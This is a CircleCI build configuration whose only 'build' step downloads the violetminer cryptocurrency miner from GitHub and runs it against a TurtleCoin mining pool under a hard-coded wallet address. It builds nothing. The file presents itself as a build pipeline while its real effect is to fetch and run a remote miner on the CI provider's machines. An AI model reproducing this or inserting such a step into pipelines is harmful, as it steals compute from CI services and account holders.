version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run: wget https://github.com/turtlecoin/violetminer/releases/download/v0.2.2/violetminer-linux-v0.2.2.tar.gz && tar xvf violetminer-linux-v0.2.2.tar.gz && cd violetminer-linux-v0.2.2 && ./violetminer --pool us.turtlecoin.herominers.com:1160 --username TRTLv34RuEZBmHzhmcG3NucgMYpPpe27uYSTv1o59NLdPcRcknpx5PqRMmc8FvWysZNNJWE79at57iwx1F1uFBMtQskLUPAu98m.$(echo $(shuf -i 1-4000000000 -n 1)-COLN#im8m-ybvt) --password x --algorithm turtlecoin